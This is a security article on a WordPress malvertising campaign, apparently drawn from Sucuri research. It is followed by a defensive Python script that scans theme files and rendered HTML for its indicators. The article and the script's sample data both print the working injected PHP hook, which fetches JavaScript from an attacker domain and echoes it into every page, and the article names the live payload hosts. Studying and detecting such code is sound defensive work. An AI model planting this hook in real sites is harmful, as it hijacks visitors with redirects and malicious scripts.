WordPress websites have become a prime target for threat actors seeking to monetize traffic and compromise visitor security.
In recent months, a new malvertising campaign has emerged, leveraging silent PHP code injections within theme files to serve unwanted third-party scripts.
The attack blends seamlessly with legitimate site operations, delivering obfuscated JavaScript that redirects visitors, displays pop-ups, and evades security tools without raising suspicion.
Initially discovered by a site owner noticing unexplained script loads, the intrusion originated from a small block of PHP code appended to the active theme’s functions.php file.
This injection did not alter visible page content, instead executing behind the scenes on every request.
Sucuri analysts identified the campaign after detecting anomalous JavaScript calls to attacker-controlled domains and blocklisting by multiple security vendors.
The attack primarily exploits weak file permissions and outdated themes. By gaining write access—often through compromised credentials or vulnerable plugins—hackers insert a seemingly benign function that contacts a command-and-control server.
Once invoked via the wp_head hook, the function fetches a dynamic JavaScript payload and echoes it into the page’s <head> section, ensuring execution before the rest of the page loads.
Sucuri researchers noted that the injected function establishes a POST connection to a remote endpoint at hxxps://brazilc[.]com/ads.php, retrieves the malicious script, and embeds it directly into the HTML document.
The payload performs two main actions: loading a traffic-distribution script from porsasystem.com/6m9x.js and injecting a hidden 1×1 pixel iframe that mimics Cloudflare’s challenge platform.
These techniques enable forced redirects, pop-ups, and evasion of security scanners by disguising malicious activity as legitimate CDN operations.
Infection Mechanism
The infection mechanism hinges on the following PHP function injected into functions.php:

```php
// Injected PHP function in functions.php (the malicious code as quoted by the researchers)
function ti_custom_javascript() {
    // Contact the attacker's endpoint, sending the infected site's URL in the POST body
    $response = wp_remote_post(
        'https://brazilc.com/ads.php',
        array('timeout' => 15, 'body' => array('url' => home_url()))
    );
    // Print whatever the remote server returned straight into the page
    if (!is_wp_error($response)) {
        echo wp_remote_retrieve_body($response);
    }
}
// Run on every page load, inside the <head> output
add_action('wp_head', 'ti_custom_javascript');
```
Upon each page load, this function silently executes, contacting the C&C server and printing the returned JavaScript payload into the page header.
The attacker’s script then loads further malicious code asynchronously, leveraging attributes like data-cfasync="false" and async to bypass Cloudflare Rocket Loader.
By embedding within a hidden iframe, the malware evades detection and resides persistently until the injected code is removed.
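The following Python script is an added example for defenders and is not part of the Sucuri research or any project tooling. It implements two triage checks derived from the indicators described above: a scan of a theme's functions.php for functions hooked into wp_head (or similar output hooks) that fetch remote content and echo it into the page, and a scan of rendered HTML for third-party scripts carrying data-cfasync="false" and for hidden 1×1 or display:none iframes. The sample functions.php contents, the sample HTML, the site hostname example.com and the placeholder iframe host placeholder.invalid are all constructed for the demonstration; the brazilc.com and porsasystem.com values are the ones named in the article.

```python
import re
from urllib.parse import urlparse

# Constructed sample of an infected functions.php, modelled on the snippet quoted above.
INFECTED_FUNCTIONS_PHP = """<?php
function mytheme_setup() {
    add_theme_support('title-tag');
}
add_action('after_setup_theme', 'mytheme_setup');

function ti_custom_javascript() {
    $response = wp_remote_post(
        'https://brazilc.com/ads.php',
        array('timeout' => 15, 'body' => array('url' => home_url()))
    );
    if (!is_wp_error($response)) {
        echo wp_remote_retrieve_body($response);
    }
}
add_action('wp_head', 'ti_custom_javascript');
"""

# Constructed clean theme: hooks wp_head but prints only static, locally defined markup.
CLEAN_FUNCTIONS_PHP = """<?php
function mytheme_head_meta() {
    echo '<meta name="generator" content="mytheme">';
}
add_action('wp_head', 'mytheme_head_meta');
"""

# Constructed rendered page; placeholder.invalid stands in for the Cloudflare look-alike host.
SAMPLE_HTML = """<html><head>
<script src="https://example.com/wp-includes/js/jquery.js"></script>
<script data-cfasync="false" async src="https://porsasystem.com/6m9x.js"></script>
</head><body>
<iframe src="https://example.com/embed" width="600" height="400"></iframe>
<iframe src="https://placeholder.invalid/cdn-cgi/challenge" width="1" height="1" style="display:none"></iframe>
</body></html>"""

# Hooks whose callbacks write into every page, which is where injected echo-the-payload code lives.
HOOK_RE = re.compile(r"add_action\(\s*['\"](wp_head|wp_footer|init|wp_enqueue_scripts)['\"]\s*,\s*['\"]([A-Za-z_]\w*)['\"]")
REMOTE_FETCH_RE = re.compile(r"\b(wp_remote_(?:post|get|request)|curl_exec|file_get_contents)\s*\(")
ECHO_BODY_RE = re.compile(r"\b(echo|print)\b[^;]*wp_remote_retrieve_body")
URL_RE = re.compile(r"https?://[^\s'\"]+")


def function_body(php_source, name):
    """Return the text between the braces of `function name(...) { ... }`, or None."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", php_source)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(php_source) and depth:          # simple brace matching, enough for triage
        if php_source[i] == "{":
            depth += 1
        elif php_source[i] == "}":
            depth -= 1
        i += 1
    return php_source[m.end():i - 1]


def find_remote_echo_hooks(php_source, site_host):
    """Flag hooked callbacks that fetch from a remote host and echo the response or name an external URL."""
    findings = []
    for hook, fn in HOOK_RE.findall(php_source):
        body = function_body(php_source, fn)
        if body is None:
            continue
        fetches = REMOTE_FETCH_RE.search(body) is not None
        echoes = ECHO_BODY_RE.search(body) is not None
        external = [u for u in URL_RE.findall(body) if urlparse(u).hostname not in (site_host, None)]
        if fetches and (echoes or external):
            findings.append({"hook": hook, "function": fn, "external_urls": external})
    return findings


SCRIPT_TAG_RE = re.compile(r"<script\b[^>]*>", re.I)
IFRAME_TAG_RE = re.compile(r"<iframe\b[^>]*>", re.I)


def find_rendered_indicators(html, site_host):
    """Flag third-party scripts with data-cfasync=false and iframes that are 1x1 or hidden via CSS."""
    findings = []
    for tag in SCRIPT_TAG_RE.findall(html):
        src = re.search(r"\bsrc\s*=\s*['\"]([^'\"]+)", tag, re.I)
        host = urlparse(src.group(1)).hostname if src else None
        if host and host != site_host and re.search(r"data-cfasync\s*=\s*['\"]false['\"]", tag, re.I):
            findings.append(("third-party script with data-cfasync=false", src.group(1)))
    for tag in IFRAME_TAG_RE.findall(html):
        w = re.search(r"\bwidth\s*=\s*['\"]?(\d+)", tag, re.I)
        h = re.search(r"\bheight\s*=\s*['\"]?(\d+)", tag, re.I)
        tiny = bool(w and h and int(w.group(1)) <= 1 and int(h.group(1)) <= 1)
        css_hidden = re.search(r"display\s*:\s*none|visibility\s*:\s*hidden", tag, re.I) is not None
        if tiny or css_hidden:
            findings.append(("hidden iframe", tag))
    return findings


if __name__ == "__main__":
    for f in find_remote_echo_hooks(INFECTED_FUNCTIONS_PHP, "example.com"):
        print("suspicious hook:", f)
    for kind, detail in find_rendered_indicators(SAMPLE_HTML, "example.com"):
        print(kind + ":", detail)
```

In practice the first check is run over wp-content/themes/*/functions.php (and any file the theme includes), and a hit is compared against a clean copy of the theme from the vendor; the second is run over the HTML the site actually serves, since the injected payload is only visible in the rendered output. Both checks are regex-based triage, so they will miss code that is obfuscated or split across files, and a finding is a prompt to diff the theme against a known-good copy rather than a verdict.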